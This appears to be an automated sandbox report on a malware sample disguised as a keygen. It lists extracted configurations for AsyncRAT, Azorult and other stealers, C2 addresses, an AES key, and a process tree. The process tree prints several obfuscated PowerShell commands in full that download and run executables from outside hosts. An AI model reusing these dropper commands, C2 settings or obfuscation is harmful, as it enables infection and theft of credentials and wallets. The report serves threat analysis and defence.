Overview

overview

10

Static

static

8

ฺฺฺ�...�ฺ1m

windows10_x64

10

ฺฺฺ�...�ฺ1m

windows10_x64

10

ฺฺฺ�...�ฺ1m

windows10_x64

1

ฺฺฺ�...�ฺ1m

windows10_x64

8

ฺฺฺ�...�ฺ1m

windows10_x64

3

ฺฺฺ�...�ฺ1m

windows10_x64

1

ฺฺฺ�...�ฺ1m

windows10_x64

10

ฺฺฺ�...�ฺ1m

windows10_x64

10

ฺฺฺ�...�ฺ1m

windows10_x64

10

ฺฺฺ�...�ฺ1m

windows10_x64

10

ฺฺฺ�...�ฺ1m

windows10_x64

8

ฺฺฺ�...�ฺ1m

windows10_x64

1

ฺฺฺ�...�ฺ1m

windows10_x64

1

ฺฺฺ�...�ฺ1m

windows10_x64

10

ฺฺฺ�...�ฺ1m

windows10_x64

3

ฺฺฺ�...�ฺ1m

windows10_x64

1

ฺฺฺ�...�ฺ1m

windows10_x64

3

ฺฺฺ�...�ฺ1m

windows10_x64

10

ฺฺฺ�...�ฺ1m

windows10_x64

8

ฺฺฺ�...�ฺ1m

windows10_x64

10

ฺฺฺ�...�ฺ1m

windows10_x64

1

ฺฺฺ�...�ฺ1m

windows10_x64

1

ฺฺฺ�...�ฺ1m

windows10_x64

10

ฺฺฺ�...�ฺ1m

windows10_x64

10

ฺฺฺ�...�ฺ1m

windows10_x64

1

ฺฺฺ�...�ฺ1m

windows10_x64

3

Resubmissions

18-11-2020 14:18

201118-dj27sn3f52 10

18-11-2020 13:42

201118-1arz86e7w6 10

18-11-2020 13:38

201118-n8jh228ctn 10

Analysis

  • max time kernel
    59s
  • max time network
    57s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    18-11-2020 13:38

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Keygen.bin.exe

Score
10/10
asyncratazorultoskiraccoondiscoveryinfostealerratspywarestealertrojan

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe
exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv
exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe
exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT
exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD
exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe
exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Family

azorult

C2

http://195.245.112.115/index.php

Extracted

Family

asyncrat

Version

0.5.7B

C2

agentttt.ac.ug:6970

agentpurple.ac.ug:6970
Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • aes_key

    16dw6EDbQkYZp5BTs7cmLUicVtOA4UQr

  • anti_detection

    false

  • autorun

    false

  • bdos

    false

  • delay

    Default

  • host

    agentttt.ac.ug,agentpurple.ac.ug

  • hwid

    3

  • install_file

  • install_folder

    %AppData%

  • mutex

    AsyncMutex_6SI8OkPnk

  • pastebin_config

    null

  • port

    6970

  • version

    0.5.7B

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

    ratasyncrat
  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

    trojaninfostealerazorult
  • Contains code to disable Windows Defender 4 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

    infostealeroski
  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

    stealerraccoon
  • Async RAT payload 2 IoCs
    rat
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 21 IoCs
  • Loads dropped DLL 11 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 1 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
    evasion
  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Keygen.bin.exe
    "C:\Users\Admin\AppData\Local\Temp\Keygen.bin.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:640
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BD6A.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\Keygen.bin.exe"
      2⤵
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:3160
      • C:\Users\Admin\AppData\Local\Temp\BD6A.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:3848
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\BD6A.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2440
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1996
          • C:\Users\Public\gxd.exe
            "C:\Users\Public\gxd.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:5100
            • C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe
              "C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:4256
              • C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe
                "C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe"
                7⤵
                • Executes dropped EXE
                PID:4760
            • C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe
              "C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:4492
              • C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe
                "C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:4704
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 4704 & erase C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe & RD /S /Q C:\\ProgramData\\110807420359333\\* & exit
                  8⤵
                    PID:4892
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 4704
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4928
              • C:\Users\Public\gxd.exe
                "C:\Users\Public\gxd.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops desktop.ini file(s)
                PID:4576
                • C:\Users\Admin\AppData\Local\Temp\Lxob3xFlxO.exe
                  "C:\Users\Admin\AppData\Local\Temp\Lxob3xFlxO.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4672
                  • C:\Users\Admin\AppData\Local\Temp\Lxob3xFlxO.exe
                    "C:\Users\Admin\AppData\Local\Temp\Lxob3xFlxO.exe"
                    8⤵
                    • Executes dropped EXE
                    PID:4168
                  • C:\Users\Admin\AppData\Local\Temp\Lxob3xFlxO.exe
                    "C:\Users\Admin\AppData\Local\Temp\Lxob3xFlxO.exe"
                    8⤵
                    • Executes dropped EXE
                    PID:2920
                • C:\Users\Admin\AppData\Local\Temp\6jkGc1iBrs.exe
                  "C:\Users\Admin\AppData\Local\Temp\6jkGc1iBrs.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:4916
                • C:\Users\Admin\AppData\Local\Temp\CVLiRxRyTm.exe
                  "C:\Users\Admin\AppData\Local\Temp\CVLiRxRyTm.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3980
                  • C:\Users\Admin\AppData\Local\Temp\CVLiRxRyTm.exe
                    "C:\Users\Admin\AppData\Local\Temp\CVLiRxRyTm.exe"
                    8⤵
                    • Executes dropped EXE
                    PID:296
                  • C:\Users\Admin\AppData\Local\Temp\CVLiRxRyTm.exe
                    "C:\Users\Admin\AppData\Local\Temp\CVLiRxRyTm.exe"
                    8⤵
                    • Executes dropped EXE
                    PID:3732
                  • C:\Users\Admin\AppData\Local\Temp\CVLiRxRyTm.exe
                    "C:\Users\Admin\AppData\Local\Temp\CVLiRxRyTm.exe"
                    8⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2112
                    • \??\c:\windows\SysWOW64\cmstp.exe
                      "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\i0goxk4y.inf
                      9⤵
                        PID:3800
                  • C:\Users\Admin\AppData\Local\Temp\qu5FSnorBt.exe
                    "C:\Users\Admin\AppData\Local\Temp\qu5FSnorBt.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • Suspicious use of AdjustPrivilegeToken
                    PID:732
                    • C:\Users\Admin\AppData\Local\Temp\qu5FSnorBt.exe
                      "C:\Users\Admin\AppData\Local\Temp\qu5FSnorBt.exe"
                      8⤵
                      • Executes dropped EXE
                      PID:2324
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\gxd.exe"
                    7⤵
                      PID:3164
                      • C:\Windows\SysWOW64\timeout.exe
                        timeout /T 10 /NOBREAK
                        8⤵
                        • Delays execution with timeout.exe
                        PID:4248
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\BD6A.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:208
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1952
            • C:\Windows\SysWOW64\timeout.exe
              timeout 1
              3⤵
              • Delays execution with timeout.exe
              PID:2176
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\BD6A.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:632
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                4⤵
                • Blocklisted process makes network request
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:3172
                • C:\Users\Public\xbu.exe
                  "C:\Users\Public\xbu.exe"
                  5⤵
                  • Executes dropped EXE
                  PID:5052
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\BD6A.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1244
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:504
            • C:\Windows\SysWOW64\timeout.exe
              timeout 2
              3⤵
              • Delays execution with timeout.exe
              PID:1520
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\BD6A.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3460
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                4⤵
                • Blocklisted process makes network request
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:1492
                • C:\Users\Public\xpj.exe
                  "C:\Users\Public\xpj.exe"
                  5⤵
                  • Executes dropped EXE
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:5060
                  • C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe
                    "C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe"
                    6⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • Suspicious behavior: MapViewOfSection
                    • Suspicious use of SetWindowsHookEx
                    PID:4460
                    • C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe
                      "C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe"
                      7⤵
                      • Executes dropped EXE
                      PID:4792
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\BD6A.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2304
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4056

        Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CVLiRxRyTm.exe.log
          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Lxob3xFlxO.exe.log
          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\6jkGc1iBrs.exe
          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\6jkGc1iBrs.exe
          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\BD6A.tmp\Keygen.exe
          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\BD6A.tmp\Keygen.exe
          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\BD6A.tmp\b.hta
          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\BD6A.tmp\b1.hta
          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\BD6A.tmp\ba.hta
          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\BD6A.tmp\ba1.hta
          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\BD6A.tmp\m.hta
          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\BD6A.tmp\m1.hta
          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\BD6A.tmp\start.bat
          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\CVLiRxRyTm.exe
          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\CVLiRxRyTm.exe
          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\CVLiRxRyTm.exe
          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\CVLiRxRyTm.exe
          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\CVLiRxRyTm.exe
          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe
          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe
          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe
          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\Lxob3xFlxO.exe
          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\Lxob3xFlxO.exe
          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\Lxob3xFlxO.exe
          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\Lxob3xFlxO.exe
          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\qu5FSnorBt.exe
          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\qu5FSnorBt.exe
          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\qu5FSnorBt.exe
          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe
          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe
          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe
          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe
          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe
